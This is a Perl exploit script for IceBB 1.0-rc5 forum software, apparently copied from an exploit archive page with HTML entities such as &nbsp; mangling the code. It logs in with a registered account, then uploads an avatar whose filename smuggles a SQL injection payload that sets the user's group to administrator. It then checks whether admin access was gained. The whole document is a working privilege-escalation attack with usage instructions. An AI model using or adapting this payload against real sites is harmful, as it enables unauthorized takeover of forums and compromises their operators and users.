IceBB 1.0-rc5 Remote Create Admin Exploit

                                                #!/usr/bin/perl
#  IceBB 1.0-rc5 Remote Create Admin Exploit
#  1. register a user
#  2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass]
#  3. login with admin access :)
# - magic_quotes_gpc = Off
#
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use LWP::UserAgent;
use HTTP::Cookies;

$port = \"80\";
 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = \"http://\".$host;

 print q(
 ###########################################################
 #        IceBB 1.0-rc5 Remote Create Admin Exploit        #
 #                    www.Hessamx.Net                      #
 ################# (C)oded By Hessam-x #####################

);


&nbsp;if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{
&nbsp;print&nbsp;\"&nbsp;#&nbsp;&nbsp;usage&nbsp;:&nbsp;xpl.pl&nbsp;[host&path]&nbsp;[uname]&nbsp;[pass]
\";
&nbsp;print&nbsp;\"&nbsp;#&nbsp;&nbsp;e.g&nbsp;:&nbsp;xpl.pl&nbsp;www.milw0rm.com/icebb/&nbsp;str0ke&nbsp;123456
\";
&nbsp;exit();
&nbsp;}

&nbsp;&nbsp;&nbsp;print&nbsp;\"&nbsp;[~]&nbsp;User/Password&nbsp;:&nbsp;$uname/$passwd&nbsp;
\";
&nbsp;&nbsp;&nbsp;print&nbsp;\"&nbsp;[~]&nbsp;Host&nbsp;:&nbsp;$host&nbsp;
\";

&nbsp;$xpl&nbsp;=&nbsp;LWP::UserAgent->new()&nbsp;or&nbsp;die;
&nbsp;$cookie_jar&nbsp;=&nbsp;HTTP::Cookies->new();

&nbsp;$xpl->cookie_jar(&nbsp;$cookie_jar&nbsp;);


$login&nbsp;=&nbsp;$xpl->post($url.\'index.php\',
Content&nbsp;=>&nbsp;[
&nbsp;\'act\'&nbsp;=>&nbsp;\'login\',
\'from\'&nbsp;=>&nbsp;\'index.php\',
\'user\'&nbsp;=>&nbsp;$uname,
\'pass\'&nbsp;=>&nbsp;$passwd,
\'func\'&nbsp;=>&nbsp;\'Login\',
],);

&nbsp;if($cookie_jar->as_string&nbsp;=~&nbsp;/icebb_sessid=(.*?);/)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$cookie&nbsp;=&nbsp;$1;
&nbsp;&nbsp;&nbsp;print&nbsp;\"&nbsp;[~]&nbsp;Logined&nbsp;...
\";
&nbsp;}&nbsp;else&nbsp;{
&nbsp;print&nbsp;\"&nbsp;[-]&nbsp;Can&nbsp;not&nbsp;Login&nbsp;In&nbsp;$host&nbsp;!
\";
&nbsp;exit();
&nbsp;}

&nbsp;$badcode&nbsp;=&nbsp;\"\',&nbsp;user_group=\'1\";
&nbsp;$avat&nbsp;=&nbsp;$xpl->post($url.\'index.php\',Content_Type&nbsp;=>&nbsp;\'form-data\',
&nbsp;Content&nbsp;=>&nbsp;[
&nbsp;\'avtype\'&nbsp;&nbsp;=>&nbsp;\'upload\',
&nbsp;\'act\'&nbsp;=>&nbsp;\'ucp\',
&nbsp;\'func\'&nbsp;=>&nbsp;\'avatar\',
&nbsp;\'file\'&nbsp;&nbsp;&nbsp;=>&nbsp;[
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;undef,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'avatar.jpg\'.$badcode,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Content_type&nbsp;=>&nbsp;\'text/plain\',
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Content&nbsp;=>&nbsp;\'MYAVATAR\',
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;],
&nbsp;\'submit\'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=>&nbsp;\'Save\',
&nbsp;],
&nbsp;);
&nbsp;$test&nbsp;=&nbsp;$xpl->get($url.\'index.php\');
if($test->as_string&nbsp;=~&nbsp;/Admin&nbsp;Control&nbsp;Center/)&nbsp;{
print&nbsp;\"&nbsp;[+]&nbsp;You&nbsp;Are&nbsp;admin&nbsp;Now&nbsp;!&nbsp;
\";
}&nbsp;else&nbsp;{
print&nbsp;\"&nbsp;[-]&nbsp;Exploit&nbsp;Failed&nbsp;!&nbsp;
\";
}
print&nbsp;\"
&nbsp;####################################################&nbsp;
\";

&nbsp;